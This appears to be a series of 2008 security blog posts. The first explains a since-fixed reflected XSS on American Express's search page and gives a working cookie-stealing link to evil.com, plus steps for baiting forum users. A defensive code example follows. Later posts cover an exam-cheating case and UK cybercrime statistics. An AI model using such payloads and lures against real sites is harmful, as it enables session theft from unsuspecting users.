A Quick Amex XSS

Here is a quick description of a cross-site scripting exploit that was fixed today on the American Express website.

The vulnerability was in the search engine of the site, which didn’t sanitize the input keywords. Therefore anyone could insert JavaScript into the search and use this to trick people into sending their cookies to the attacker.

All you need to do is

1)      Set up a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)

2)      Create a script to save the stolen cookies into a file or database and put it online.

3)      Get the malicious search link. The code snippet needed to cause the search to inject JavaScript is:

Where XXX is your code that does whatever you want it to do. If you want to steal the cookie, the code would then be something like:

So the link to use to lure people into sending their cookies would be something like:

http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E

4)      Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)

This XSS has now been fixed, after it started to go public. The researcher who found the bug[1] had a particularly hard time convincing Amex about this security problem.

A video of the simple exploit is available at: http://holisticinfosec.org/video/online_finance/amex.html
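The flaw and its fix, as an added example that is not from the original post and is not Amex's code: the same search-results template with the keyword echoed verbatim and with it encoded on output, run against the link quoted above. The template, the function names and the assumption that the keyword landed inside an attribute value (suggested by the leading `">` in the link) are illustrative.

```javascript
// Added example: reflected search keyword, without and with output encoding.
// Template and function names are assumptions for illustration.

// Link quoted in the post; q starts with "> followed by a script element.
const LINK_FROM_POST =
  "http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E";

// Decode the q parameter the way the server would receive it.
function searchTerm(link) {
  return new URL(link).searchParams.get("q") ?? "";
}

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// 'Before': keyword echoed verbatim, so "> closes the attribute and the tag.
function renderVulnerable(q) {
  return `<input name="q" value="${q}"><p>Results for ${q}</p>`;
}

// 'After': same template, keyword encoded at the point of output.
function renderHardened(q) {
  const safe = escapeHtml(q);
  return `<input name="q" value="${safe}"><p>Results for ${safe}</p>`;
}

// Check used here to tell whether the markup contains a live script element.
function hasScriptElement(html) {
  return /<script\b/i.test(html);
}

// Defence in depth: a session cookie flagged HttpOnly is not exposed
// through document.cookie, so a reflected script cannot read it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

const q = searchTerm(LINK_FROM_POST);
console.log("verbatim echo contains script element:", hasScriptElement(renderVulnerable(q)));
console.log("encoded echo contains script element: ", hasScriptElement(renderHardened(q)));
console.log("Set-Cookie:", sessionCookieHeader("session", "constructed-sample-value"));
```

Encoding at output time fixes the reflection itself; the `HttpOnly` flag only limits what a script could read if another injection point were missed.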

See also:

“American Express web bug exposes card holders”, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)


[1] “Holistic Security”, Russ McRee, December 17, 2008 http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)

High-tech Cheating

A man and a woman, Steve Lee and Rong Yang, were convicted last week and sentenced to eight months in prison after helping two Chinese men cheat on their immigration exams, according to a news report from the Metropolitan Police Service[1]. The duo was monitoring the examination from a vehicle outside the building with laptops, transmitters and other equipment.

“Lee and Yang were clearly involved in a sophisticated operation using some of the best surveillance technology available worth thousands of pounds. When we first arrived at the scene it was very confusing as to what exactly was going on.”

It’s hard to tell what the “best surveillance technology available worth thousands of pounds” was, since no detailed equipment list was given, but we might expect this to be largely exaggerated. The report states that Zhuang, the examinee, was given “tiny buttonhole cameras sewn in, a microphone and a small ear piece”. With this equipment, the information was transmitted back to Lee and Yang, who told Zhuang the answers to the questions.

“Best surveillance equipment” found in the car

I decided to look up the equipment needed to conduct such an operation. The following material can be found without looking very hard on the net:

· Wireless Button Camera – £226.37

· Wireless Microphone – £133.13

· Wireless Earpiece – £134

· Laptop – £429

· Wireless Router – £51

Total: £973.5

Unless I’m forgetting something worth more than £1000, this is far from being “thousands of pounds”. And I’m quite sure you can get these items cheaper if you look on eBay.

Anyway, the cheaters were caught after a member of the public reported seeing Lee and Yang sitting in a silver BMW with wires running from under the hood to the inside of the car.

Sergeant Dominic Washington, who first responded to the call from the public, said:

“However, working with colleagues from across the borough and the Met we believe that we have uncovered an established criminal enterprise that may be in operation in other parts of the country.”

No, I don’t think so… but this might give ideas to the others. And why were there wires under the car?


[1] “Two convicted for immigration test scam”, Metropolitan Police Service, November 14, 2008, http://cms.met.police.uk/news/convictions/two_convicted_for_immigration_test_scam (accessed on November 17, 2008)

Cybercrime Rose by 9% in Britain

The BBC reports that cybercrime rose by 9% in Britain[1]. This is according to online identity firm Garlik, which released its 2008 Cybercrime Report. The report contains interesting statistics. Among others, identity theft dropped from 92 000 offenses in 2006 to 84 700, an 8% drop[2]. Financial fraud rose by 24% and is expected to increase for 2008-2009, mainly due to the ongoing financial crisis. The report cites the leaked letter from the Home Office indicating a possible rise in crime[3]. This is really no surprise.

Still according to the report, the top three stolen documents for identity theft were non-UK passports, utility bills and UK passports[4]. As for financial cybercrimes, losses from UK victims amounted to £535 million (1 billion $CAN, 869 million $US), up 25% from 2006. The report further states this interesting bit of information:

“… personal details and identity information are traded online with the [report footnote 15: Research conducted by Garlik’s team of researchers investigating the presence of illegal trading networks on the Internet] number of trading networks more than doubling (from 27 to 57) over the past nine months. In a typical day, around 520 individual information traders are identified with 19,217 traders being identified this year. Of these, around 700 are ‘long term’ traders …”[5]

Cybercrime in the UK rose by more than 9% in 2007

That’s 57 trading networks and around 20 000 traders, which, at least for me, is a big number. But the report doesn’t specify how those traders were identified. The 700 “long-term” traders seem to be identified only by their online aliases. Therefore, if the “20 000 traders” figure is counted using aliases, this number might be higher than the actual number of traders.

The report does not go into great detail on how the criminals get the information, but it does mention Trojans, phishing and SQL injections as ways to retrieve the information. As for the damage caused by these for UK companies, 830 000 companies reported a computer-related incident last year. Viruses accounted for 21% of those incidents and are on the decline.

Fortunately, the report also mentions the lack of data protection from the government but fails to give any number, since it’s outside the scope of the document. But shouldn’t it be considered so? Shouldn’t this be considered as criminal negligence? After all, lost data impacts lives and can lead to disaster for the victims of this negligence…

Garlik also describes interesting statistics about online harassment. The complete report can be found here: http://www.garlik.com/static_pdfs/cybercrime_report_2008.pdf


[1] “Cybercrime wave sweeping Britain”, BBC News, October 30, 2008,  http://news.bbc.co.uk/2/hi/technology/7697704.stm (accessed October 30, 2008)

[2] “UK Cybercrime Report 2008”, Stefan Fafinski, Neshan Minassian, Garlik, September 2008, p. 5

[3] “Leaked letter predicts crime rise”, BBC News, September 1, 2008,  http://news.bbc.co.uk/2/hi/uk_news/politics/7591072.stm (accessed on October 30, 2008)

[4] “UK Cybercrime Report 2008”, Stefan Fafinski, Neshan Minassian, Garlik, September 2008, p. 12

[5] Idem, p. 16